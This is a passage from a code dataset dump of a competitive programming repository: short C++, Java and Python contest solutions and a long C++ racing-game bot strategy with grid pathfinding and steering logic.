\"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3012048304080963, "alphanum_fraction": 0.34939759969711304, "avg_line_length": 15.600000381469727, "blob_id": "21110d22193539b8f376507ed535ab834d2866f7", "content_id": "c2ead54a93838afb68b35ad8007d2626814f9103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 249, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/CodeForce/0316/lol.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nint main()\n{\n float x = 0;\n int n = 0;\n std::cout.precision(8);\n while (true)\n {\n n++;\n x += 1.0 / n;\n if (n % 100000 == 0)\n std::cout << x << \"\\n\" << \"n == \" << n << \"\\n\";\n }\n}\n" }, { "alpha_fraction": 0.32382506132125854, "alphanum_fraction": 0.33224666118621826, "avg_line_length": 22.754838943481445, "blob_id": "81a192363660902b51d721cbfcb91a6e515079d9", "content_id": "8a81216e9155c4c98d76907c55feca781b7a133d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3681, "license_type": "no_license", "max_line_length": 78, "num_lines": 155, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class B {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = \"anc\";\n \n double q(int n, int k) {\n double ans = 0;\n \n int m = 100000;\n \n for (int i = 0; i < m; i++) {\n double w = Math.PI / m;\n double x = Math.PI * i / m;\n double h = Math.pow(Math.cos(x), n) * Math.cos((n - 2 * k) * x);\n ans += w * h;\n }\n \n return ans * (1 << n) / Math.PI;\n }\n \n public void solve() {\n int n = in.nextInt(), k = in.nextInt(), m = Math.max(n, k) + 1;\n \n long mod = 1L << in.nextInt();\n \n if (k > n) {\n out.println(0);\n return;\n }\n \n int[] s = new int[m];\n int[][] p = new int[m][16];\n int[][] e = new int[m][16];\n \n for (int i = 2; i < m; i++) {\n if (s[i] == 0) {\n \n long curP = i;\n int curE = 1;\n while (curP < m) {\n long d = 1;\n while (d * curP < m) {\n if (d % i != 0) {\n int j = (int) (d * curP);\n p[j][s[j]] = i;\n e[j][s[j]] = curE;\n ++s[j];\n }\n ++d;\n }\n \n ++curE;\n curP *= i;\n }\n }\n \n }\n \n int[] a = new int[m];\n \n for (int i = 2; i <= n; i++) {\n for (int j = 0; j < s[i]; j++) {\n a[p[i][j]] += e[i][j];\n }\n }\n \n for (int i = 2; i <= k; i++) {\n for (int j = 0; j < s[i]; j++) {\n a[p[i][j]] -= e[i][j];\n }\n }\n \n for (int i = 2; i <= (n - k); i++) {\n for (int j = 0; j < s[i]; j++) {\n a[p[i][j]] -= e[i][j];\n }\n }\n \n long ans = 1 % mod;\n for (int i = 0; i < m; i++) {\n while (a[i] > 0) {\n ans = (ans * i) % mod;\n --a[i];\n }\n \n }\n \n out.println(ans);\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new B().run();\n }\n}" }, { "alpha_fraction": 0.589595377445221, "alphanum_fraction": 0.6069363951683044, "avg_line_length": 20.625, "blob_id": "ed5f6d9bfc55f2c17a0b13e23b34b7b50a07fe79", "content_id": "3d885acbf942c2ab35e029f0565bc259772479c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/2015/yaQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "strings = input().split()\ninput()\ncorr = input().split()\ncount = 0\nfor s in strings:\n if not s in corr:\n count += 1\nprint(\"Correct\" if count == 0 else \"Misspell\")\n" }, { "alpha_fraction": 0.3969394266605377, "alphanum_fraction": 0.4266846179962158, "avg_line_length": 29.82023811340332, "blob_id": "63fb62211dcc1dd395619918841c3c31acc0e86f", "content_id": "17aa77ff867db44cc8205674ddcfaf6dc48547ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 26886, "license_type": "no_license", "max_line_length": 275, "num_lines": 840, "path": "/trains/ai/cpp-cgdk/38.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n#define go(p, a, b) { if (p) goto a; else goto b; }\r\n\r\n#include <bits/stdc++.h>\r\n//#ifdef ONLINE_JUDGE\r\n//#define debug 1\r\n//#endif\r\n#ifdef debug\r\n#undef debug\r\n#endif\r\n//#include \"library.h\"\r\n//#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 90;\r\nint FORCE_BACK = 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 17;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\n\r\nbool changed = false;\r\ndouble eps = 5;\r\ndouble power = 0.85;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\nvector<vector<TileType>> TEMP;\r\nbool init = true;\r\nbool snake = false;\r\nbool drift = false;\r\ndouble width;\r\ndouble height;\r\nint d = 0;\r\nint pd = 0;\r\nset<pair<int, int>> bad;\r\nvector<pair<int, int>> old;\r\n\r\n#define RIGHT 0\r\n#define UP 1\r\n#define LEFT 2\r\n#define DOWN 3\r\n\r\nvector<int> ddx = {1, 0, -1, 0};\r\nvector<int> ddy = {0, -1, 0, 1};\r\nmap<pair<int, int>, int> directions;\r\n\r\nvector<vector<vector<int>>> FUUUUU = {\r\n/*0 сначала шли вправо*/\r\n {\r\n //->\r\n {\r\n RIGHT, UP, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, RIGHT, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, RIGHT, LEFT, UP\r\n }\r\n },\r\n/*1 сначала шли вверх*/ \r\n {\r\n //->\r\n {\r\n RIGHT, UP, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, LEFT, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, LEFT, RIGHT, UP\r\n }\r\n },\r\n/*2 сначала шли влево*/ \r\n {\r\n //->\r\n {\r\n RIGHT, UP, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, LEFT, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, LEFT, RIGHT, UP\r\n }\r\n },\r\n/*3 сначала шли вниз*/ \r\n {\r\n //->\r\n {\r\n RIGHT, DOWN, UP, LEFT\r\n },\r\n //^\r\n {\r\n UP, RIGHT, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, DOWN, UP, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, RIGHT, LEFT, UP\r\n }\r\n }\r\n};\r\n\r\nstruct vertex\r\n{\r\n int x, y, d, pd; \r\n vertex(){} \r\n vertex(int x, int y, int pd, int d) : x(x), y(y), d(d), pd(pd) {}\r\n};\r\n\r\ntemplate <typename T>\r\nvoid ppp(vector<vector<T>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\ndouble getCenter(double xxx)\r\n{\r\n return (xxx + 0.5) * tileSize;\r\n}\r\n\r\ndouble get(double xxx)\r\n{\r\n return xxx * tileSize;\r\n}\r\n\r\ndouble get34(double xxx)\r\n{\r\n return (xxx + 0.75) * tileSize;\r\n}\r\n\r\ndouble get14(double xxx)\r\n{\r\n return (xxx + 0.25) * tileSize;\r\n}\r\n\r\nbool isVertical(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.first == b.first;\r\n}\r\n\r\nbool isHorizontal(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.second == b.second;\r\n}\r\n\r\nbool is32(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]))\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is3_2(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isVertical(a[1], a[4]) &&\r\n isHorizontal(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isHorizontal(a[1], a[4]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is212(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4]) &&\r\n isHorizontal(a[1], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]) &&\r\n isVertical(a[1], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is41(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\r\n else\r\n return make_pair(get(max(a.first, b.first)), getCenter(a.second));\r\n}\r\n\r\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(get14(a.first), a.second > b.second ? get14(a.second) : get34(a.second));\r\n else\r\n return make_pair(get14(a.first), get14(a.second));\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n int countOfMyCars = 0;\r\n for (auto car : world.getCars())\r\n countOfMyCars += car.isTeammate();\r\n if (countOfMyCars == 2)\r\n return;\r\n if (init)\r\n {\r\n init = false;\r\n ppp(world.getTilesXY());\r\n TEMP = world.getTilesXY();\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n pd = d;\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n if (old.size())\r\n {\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n }\r\n old.push_back({qx, qy});\r\n\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n wp.push_back(wp[0]);\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int fi, fj, pi, pj;\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex + 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n if (bad.find({si, sj}) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int ti, int tj, int pd, int dd)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\");\r\n#endif\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n while (q.size())\r\n {\r\n int u = q.front().x;\r\n int v = q.front().y;\r\n int prevD = q.front().d;\r\n int prevprevD = q.front().pd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n if (u == ti && v == tj)\r\n {\r\n vector<pair<int, int>> path;\r\n pair<int, int> start = {si, sj};\r\n while (u != start.first || v != start.second)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back(start);\r\n reverse(path.begin(), path.end());\r\n return path;\r\n }\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n if (d[u + dx[i]][v + dy[i]] == 10000)\r\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\r\n prev[u + dx[i]][v + dy[i]] = {u, v},\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path = getPath(si, sj, ti, tj, pd, d);\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n int t = 0;\r\n int y = 0;\r\n auto zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n zxcv = path[path.size() - 2],\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n path.pop_back();\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y);\r\n if (temp.size() == 0)\r\n break;\r\n for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n writeln();\r\n writeln(xxx);\r\n writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = path[3];\r\n snake = true;\r\n\r\n // cd\r\n //ab\r\n if ((ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj))\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = 0.3;\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[i - 1].first;\r\n pj = path[i - 1].second;\r\n fi = path[i + 1].first;\r\n fj = path[i + 1].second;\r\n break;\r\n }\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n //else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (TEMP[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\nlt:\r\n TEMP[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\nrt:\r\n TEMP[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\nlb:\r\n TEMP[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\nrb:\r\n TEMP[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\nth:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\nbh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n //ppp(TEMP);\r\n //cout << \"\\n\";\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36))\r\n {\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - width - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + width + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n //if (is32(path) && path.size() >= 4)\r\n //tie(nextWaypointX, nextWaypointY) = getCorner(path[2], path[3]);\r\n //cout << targetX << \" \" << targetY << \"\\n\";\r\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (!forceBack && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n if (forceSlow)\r\n forceSlow--;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.72;\r\n //if (is3_2(path))\r\n //dd *= 1.6;\r\n if (is212(path))\r\n dd *= 2;\r\n if (is41(path))\r\n dd *= 1.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find({si, sj}) == bad.end()) || forceSlow || (bad.find({si, sj}) != bad.end() && speedModule > 8))\r\n move.setBrake(true);\r\n power = 1.0;\r\n }\r\n }\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]))\r\n //if (self.getAngleTo(car) + 